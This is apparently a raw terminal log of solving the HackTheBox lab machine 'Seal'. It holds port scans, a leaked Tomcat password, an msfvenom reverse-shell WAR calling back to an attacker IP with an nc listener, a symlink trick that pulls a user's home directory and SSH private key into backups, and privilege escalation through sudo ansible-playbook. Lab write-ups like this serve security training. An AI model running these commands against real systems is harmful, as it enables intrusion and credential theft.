CrazyInSide:~/HackTheBox$ sudo masscan -p1-65535,U:1-65535 --rate 2000 -e tun0 10.10.10.250Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2022-09-01 10:04:57 GMTInitiating SYN Stealth ScanScanning 1 hosts [131070 ports/host]Discovered open port 8080/tcp on 10.10.10.250                                  Discovered open port 443/tcp on 10.10.10.250                                   Discovered open port 22/tcp on 10.10.10.250                                                                                                                                                                                                                              CrazyInSide:~/HackTheBox$ sudo nmap -sC -sV 10.10.10.250 -p8080,443,22                     Starting Nmap 7.92SVN ( https://ParrotOS.org ) at 2022-09-01 18:09 CSTNmap scan report for 10.10.10.250Host is up (0.083s latency).PORT     STATE SERVICE    VERSION22/tcp   open  ssh        OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   3072 4b894739673d07315e3f4c27411ff967 (RSA)|   256 04a74f399565c5b08dd5492ed8440036 (ECDSA)|_  256 b45e8393c54249de7125927123b18554 (ED25519)443/tcp  open  ssl/http   nginx 1.18.0 (Ubuntu)| tls-alpn: |_  http/1.1|_http-server-header: nginx/1.18.0 (Ubuntu)| ssl-cert: Subject: commonName=seal.htb/organizationName=Seal Pvt Ltd/stateOrProvinceName=London/countryName=UK| Not valid before: 2021-05-05T10:24:03|_Not valid after:  2022-05-05T10:24:03|_http-title: Seal Market|_ssl-date: TLS randomness does not represent time| tls-nextprotoneg: |_  http/1.18080/tcp open  http-proxy| http-auth: | HTTP/1.1 401 Unauthorized\x0D|_  Server returned status 401 but no WWW-Authenticate header.|_http-title: Site doesn't have a title (text/html;charset=utf-8).| fingerprint-strings: |   FourOhFourRequest: |     HTTP/1.1 401 Unauthorized|     Date: Thu, 01 Sep 2022 10:10:04 GMT|     Set-Cookie: JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2.node0; Path=/; HttpOnly|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     Content-Type: text/html;charset=utf-8|     Content-Length: 0|   GetRequest: |     HTTP/1.1 401 Unauthorized|     Date: Thu, 01 Sep 2022 10:10:03 GMT|     Set-Cookie: JSESSIONID=node0yvbmr291moot13csk9lwzfixi0.node0; Path=/; HttpOnly|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     Content-Type: text/html;charset=utf-8|     Content-Length: 0|   HTTPOptions: |     HTTP/1.1 200 OK|     Date: Thu, 01 Sep 2022 10:10:04 GMT|     Set-Cookie: JSESSIONID=node01jub9w55x03xg1mawzh2zjn5sd1.node0; Path=/; HttpOnly|     Expires: Thu, 01 Jan 1970 00:00:00 GMT|     Content-Type: text/html;charset=utf-8|     Allow: GET,HEAD,POST,OPTIONS|     Content-Length: 0|   RPCCheck: |     HTTP/1.1 400 Illegal character OTEXT=0x80|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 71|     Connection: close|     
Bad Message 400</h1>
reason: Illegal character OTEXT=0x80pre>|   RTSPRequest: |     HTTP/1.1 505 Unknown Version|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 58|     Connection: close|     
Bad Message 505</h1>
reason: Unknown Versionpre>|   Socks4: |     HTTP/1.1 400 Illegal character CNTL=0x4|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 69|     Connection: close|     
Bad Message 400</h1>
reason: Illegal character CNTL=0x4pre>|   Socks5: |     HTTP/1.1 400 Illegal character CNTL=0x5|     Content-Type: text/html;charset=iso-8859-1|     Content-Length: 69|     Connection: close|_    
Bad Message 400</h1>
reason: Illegal character CNTL=0x5pre>1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://ParrotOS.org/cgi-bin/submit.cgi?new-service :SF-Port8080-TCP:V=7.92SVN%I=7%D=9/1%Time=631084FB%P=x86_64-unknown-linux-gSF:nu%r(GetRequest,F4,"HTTP/1\.1\x20401\x20Unauthorized\r\nDate:\x20Thu,\xSF:2001\x20Sep\x202022\x2010:10:03\x20GMT\r\nSet-Cookie:\x20JSESSIONID=nodSF:e0yvbmr291moot13csk9lwzfixi0\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:SF:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\r\nContent-Type:\x20teSF:xt/html;charset=utf-8\r\nContent-Length:\x200\r\n\r\n")%r(HTTPOptions,1SF:09,"HTTP/1\.1\x20200\x20OK\r\nDate:\x20Thu,\x2001\x20Sep\x202022\x2010:SF:10:04\x20GMT\r\nSet-Cookie:\x20JSESSIONID=node01jub9w55x03xg1mawzh2zjn5SF:sd1\.node0;\x20Path=/;\x20HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x20SF:1970\x2000:00:00\x20GMT\r\nContent-Type:\x20text/html;charset=utf-8\r\nSF:Allow:\x20GET,HEAD,POST,OPTIONS\r\nContent-Length:\x200\r\n\r\n")%r(RTSSF:PRequest,AD,"HTTP/1\.1\x20505\x20Unknown\x20Version\r\nContent-Type:\x2SF:0text/html;charset=iso-8859-1\r\nContent-Length:\x2058\r\nConnection:\xSF:20close\r\n\r\n
Bad\x20Message\x20505h1><pre>reason:\x20Unknown\x2SF:0Version</pre>")%r(FourOhFourRequest,F4,"HTTP/1\.1\x20401\x20UnauthorizSF:ed\r\nDate:\x20Thu,\x2001\x20Sep\x202022\x2010:10:04\x20GMT\r\nSet-CookSF:ie:\x20JSESSIONID=node02q9tfbpnsxre1bm1gkv3wal0a2\.node0;\x20Path=/;\x2SF:0HttpOnly\r\nExpires:\x20Thu,\x2001\x20Jan\x201970\x2000:00:00\x20GMT\rSF:\nContent-Type:\x20text/html;charset=utf-8\r\nContent-Length:\x200\r\n\SF:r\n")%r(Socks5,C3,"HTTP/1\.1\x20400\x20Illegal\x20character\x20CNTL=0x5SF:\r\nContent-Type:\x20text/html;charset=iso-8859-1\r\nContent-Length:\x2SF:069\r\nConnection:\x20close\r\n\r\n
Bad\x20Message\x20400h1><pre>rSF:eason:\x20Illegal\x20character\x20CNTL=0x5</pre>")%r(Socks4,C3,"HTTP/1\SF:.1\x20400\x20Illegal\x20character\x20CNTL=0x4\r\nContent-Type:\x20text/SF:html;charset=iso-8859-1\r\nContent-Length:\x2069\r\nConnection:\x20closSF:e\r\n\r\n
Bad\x20Message\x20400h1><pre>reason:\x20Illegal\x20charaSF:cter\x20CNTL=0x4</pre>")%r(RPCCheck,C7,"HTTP/1\.1\x20400\x20Illegal\x20SF:character\x20OTEXT=0x80\r\nContent-Type:\x20text/html;charset=iso-8859-SF:1\r\nContent-Length:\x2071\r\nConnection:\x20close\r\n\r\n
Bad\x20MeSF:ssage\x20400</h1>
reason:\x20Illegal\x20character\x20OTEXT=0x80prSF:e>");Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://ParrotOS.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 40.34 secondszsh: segmentation fault  sudo nmap -sC -sV 10.10.10.250 -p8080,443,22

CrazyInSide:~/HackTheBox$ searchsploit GitBucket------------------------------------------------------------------------------------ --------------------------------- Exploit Title                                                                      |  Path------------------------------------------------------------------------------------ ---------------------------------GitBucket 4.23.1 - Remote Code Execution                                            | java/webapps/44668.py------------------------------------------------------------------------------------ ---------------------------------Shellcodes: No ResultsPapers: No Results

username="tomcat" password="42MrHBf*z8{Z%"

CrazyInSide:~/HackTheBox$ dirsearch -u https://seal.htb/    _|. _ _  _  _  _ _|_    v0.4.2 (_||| _) (/_(_|| (_| )Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927Output File: /home/crazyinside/.dirsearch/reports/seal.htb/-_22-09-01_18-51-03.txtError Log: /home/crazyinside/.dirsearch/logs/errors-22-09-01_18-51-03.logTarget: https://seal.htb/[18:51:04] Starting: [18:51:05] 302 -    0B  - /js  ->  http://seal.htb/js/[18:51:31] 400 -  804B  - /\..\..\..\..\..\..\..\..\..\etc\passwd[18:51:33] 400 -  804B  - /a%5c.aspx[18:51:36] 302 -    0B  - /admin  ->  http://seal.htb/admin/[18:52:05] 302 -    0B  - /css  ->  http://seal.htb/css/[18:52:15] 403 -  564B  - /host-manager/html[18:52:16] 302 -    0B  - /host-manager/  ->  http://seal.htb/host-manager/html[18:52:16] 302 -    0B  - /icon  ->  http://seal.htb/icon/[18:52:16] 302 -    0B  - /images  ->  http://seal.htb/images/[18:52:18] 200 -   19KB - /index.html[18:52:26] 302 -    0B  - /manager  ->  http://seal.htb/manager/[18:52:26] 403 -  564B  - /manager/html[18:52:26] 302 -    0B  - /manager/  ->  http://seal.htb/manager/html[18:52:26] 403 -  564B  - /manager/html/[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage[18:52:26] 401 -    2KB - /manager/jmxproxy[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=BEANNAME&att=MYATTRIBUTE&key=MYKEY[18:52:26] 401 -    2KB - /manager/status/all[18:52:26] 401 -    2KB - /manager/jmxproxy/?qry=STUFF[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=Catalina%3Atype%3DService&op=findConnectors&ps=[18:52:26] 401 -    2KB - /manager/jmxproxy/?get=java.lang:type=Memory&att=HeapMemoryUsage&key=used[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=Catalina%3Atype%3DValve%2Cname%3DErrorReportValve%2Chost%3Dlocalhost&att=debug&val=cow[18:52:26] 401 -    2KB - /manager/jmxproxy/?set=BEANNAME&att=MYATTRIBUTE&val=NEWVALUE[18:52:26] 401 -    2KB - /manager/jmxproxy/?invoke=BEANNAME&op=METHODNAME&ps=COMMASEPARATEDPARAMETERSTask Completed

CrazyInSide:~/HackTheBox$ msfvenom -p java/shell_reverse_tcp lhost=10.10.16.6 lport=1337 -f war -o test.warPayload size: 13316 bytesFinal size of war file: 13316 bytesSaved as: test.warCrazyInSide:~/HackTheBox$ nc -lvnp 1337listening on [any] 1337 ...connect to [10.10.16.6] from (UNKNOWN) [10.10.10.250] 43076iduid=997(tomcat) gid=997(tomcat) groups=997(tomcat)script -qc /bin/bash /dev/nulltomcat@seal:/var/lib/tomcat9$ 

tomcat@seal:/opt/backups$ lsarchives  playbooktomcat@seal:/opt/backups$ cd archives/tomcat@seal:/opt/backups/archives$ lsbackup-2022-09-01-12:30:32.gz  backup-2022-09-01-12:31:33.gztomcat@seal:/opt/backups/archives$ cat ../playbook/run.yml - hosts: localhost  tasks:  - name: Copy Files    synchronize: src=/var/lib/tomcat9/webapps/ROOT/admin/dashboard dest=/opt/backups/files copy_links=yes  - name: Server Backups    archive:      path: /opt/backups/files/      dest: "/opt/backups/archives/backup-{{ansible_date_time.date}}-{{ansible_date_time.time}}.gz"  - name: Clean    file:      state: absent      path: /opt/backups/files/tomcat@seal:/opt/backups/archives$ 

tomcat@seal:/opt/backups/archives$ ls -alltotal 2968drwxrwxr-x 2 luis luis   4096 Sep  1 12:34 .drwxr-xr-x 4 luis luis   4096 Sep  1 12:34 ..-rw-rw-r-- 1 luis luis 606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:31 backup-2022-09-01-12:31:33.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:32 backup-2022-09-01-12:32:33.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:33 backup-2022-09-01-12:33:33.gz-rw-rw-r-- 1 luis luis 606047 Sep  1 12:34 backup-2022-09-01-12:34:33.gztomcat@seal:/opt/backups/archives$ 

tomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ls -alltotal 100drwxr-xr-x 7 root root  4096 May  7  2021 .drwxr-xr-x 3 root root  4096 May  6  2021 ..drwxr-xr-x 5 root root  4096 Mar  7  2015 bootstrapdrwxr-xr-x 2 root root  4096 Mar  7  2015 cssdrwxr-xr-x 4 root root  4096 Mar  7  2015 images-rw-r--r-- 1 root root 71744 May  6  2021 index.htmldrwxr-xr-x 4 root root  4096 Mar  7  2015 scriptsdrwxrwxrwx 2 root root  4096 May  7  2021 uploadstomcat@seal:/var/lib/tomcat9/webapps/ROOT/admin/dashboard$ ln -s /home/luis /var/lib/tomcat9/webapps/ROOT/admin/dashboard/uploads

tomcat@seal:/opt/backups/archives$ ls -alltotal 113612drwxrwxr-x 2 luis luis      4096 Sep  1 12:36 .drwxr-xr-x 4 luis luis      4096 Sep  1 12:36 ..-rw-rw-r-- 1 luis luis    606047 Sep  1 12:35 backup-2022-09-01-12:35:33.gz-rw-rw-r-- 1 luis luis 115723773 Sep  1 12:36 backup-2022-09-01-12:36:32.gztomcat@seal:/opt/backups/archives$ cp backup-2022-09-01-12\:36\:32.gz /tmptomcat@seal:/opt/backups/archives$ cd /tmptomcat@seal:/tmp$ tar xf backup-2022-09-01-12\:36\:32.gz --force-localtomcat@seal:/tmp$ lsbackup-2022-09-01-12:30:32.gz  dashboard          pwk.py       tmpypck0ak1backup-2022-09-01-12:36:32.gz  hsperfdata_tomcat  tmp7e2a49nntomcat@seal:/tmp$ ls -alltotal 113636drwxrwxrwt  6 root   root        4096 Sep  1 12:38 .drwxr-xr-x 20 root   root        4096 Jul 26  2021 ..-rw-r-----  1 tomcat tomcat    606047 Sep  1 12:30 backup-2022-09-01-12:30:32.gz-rw-r-----  1 tomcat tomcat 115723773 Sep  1 12:37 backup-2022-09-01-12:36:32.gzdrwxr-x---  7 tomcat tomcat      4096 May  7  2021 dashboarddrwxr-x---  2 tomcat tomcat      4096 Sep  1 10:00 hsperfdata_tomcat-rw-r-----  1 tomcat tomcat      3448 Sep  1 12:23 pwk.pydrwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmp7e2a49nndrwx------  4 tomcat tomcat      4096 Sep  1 12:24 tmpypck0ak1tomcat@seal:/tmp$ cd dashboard/

tomcat@seal:/tmp/dashboard/uploads/luis$ ls -alltotal 51320drwxr-x--- 9 tomcat tomcat     4096 May  7  2021 .drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 ..drwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .ansible-rw-r----- 1 tomcat tomcat      220 May  5  2021 .bash_logout-rw-r----- 1 tomcat tomcat     3797 May  5  2021 .bashrcdrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .cachedrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .configdrwxr-x--- 7 tomcat tomcat     4096 Sep  1 12:38 .gitbucket-rw-r----- 1 tomcat tomcat 52497951 Jan 14  2021 gitbucket.wardrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .javadrwxr-x--- 3 tomcat tomcat     4096 Sep  1 12:38 .local-rw-r----- 1 tomcat tomcat      807 May  5  2021 .profiledrwx------ 2 tomcat tomcat     4096 Sep  1 12:38 .ssh-r-------- 1 tomcat tomcat       33 Sep  1 10:00 user.txttomcat@seal:/tmp/dashboard/uploads/luis$ cat user.txt 98f4bf24..............................

tomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ lsauthorized_keys  id_rsa  id_rsa.pubtomcat@seal:/tmp/dashboard/uploads/luis/.ssh$ cat id_rsaCrazyInSide:~/HackTheBox$ ssh -i id_rsa luis@10.10.10.250    The authenticity of host '10.10.10.250 (10.10.10.250)' can't be established.ED25519 key fingerprint is SHA256:CK0IgtHX4isQwWAPna6oD88DnRAM9OacxQExxLSnlL0.This key is not known by any other namesAre you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '10.10.10.250' (ED25519) to the list of known hosts.Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-80-generic x86_64) * Documentation:  https://help.ubuntu.com * Management:     https://landscape.canonical.com * Support:        https://ubuntu.com/advantage  System information as of Thu 01 Sep 2022 12:41:22 PM UTC  System load:  0.29              Processes:             165  Usage of /:   49.2% of 9.58GB   Users logged in:       0  Memory usage: 30%               IPv4 address for eth0: 10.10.10.250  Swap usage:   0% * Pure upstream Kubernetes 1.21, smallest, simplest cluster ops!     https://microk8s.io/22 updates can be applied immediately.15 of these updates are standard security updates.To see these additional updates run: apt list --upgradableThe list of available updates is more than a week old.To check for new updates run: sudo apt updateLast login: Fri May  7 07:00:18 2021 from 10.10.14.2luis@seal:~$ 

luis@seal:~$ sudo -lMatching Defaults entries for luis on seal:    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/binUser luis may run the following commands on seal:    (ALL) NOPASSWD: /usr/bin/ansible-playbook *luis@seal:~$ cat run.yml - hosts: localhost  tasks:  - name: cat    shell: cat /root/root.txt > flag.txt    register: out  - name: stdout    debug: msg=""  - name: stderr    debug: msg=""

luis@seal:~$ sudo /usr/bin/ansible-playbook run.yml [WARNING]: provided hosts list is empty, only localhost is available. Note that the implicit localhost does not match 'all'PLAY [localhost] *******************************************************************************************************************************************************************************TASK [Gathering Facts] *************************************************************************************************************************************************************************ok: [localhost]TASK [cat] *************************************************************************************************************************************************************************************changed: [localhost]TASK [stdout] **********************************************************************************************************************************************************************************ok: [localhost] => {    "msg": ""}TASK [stderr] **********************************************************************************************************************************************************************************ok: [localhost] => {    "msg": ""}PLAY RECAP *************************************************************************************************************************************************************************************localhost                  : ok=4    changed=1    unreachable=0    failed=0    skipped=0    rescued=0    ignored=0   luis@seal:~$ lsflag.txt  gitbucket.war  run.yml  user.txtluis@seal:~$ cat flag.txt 9b0c..............................luis@seal:~$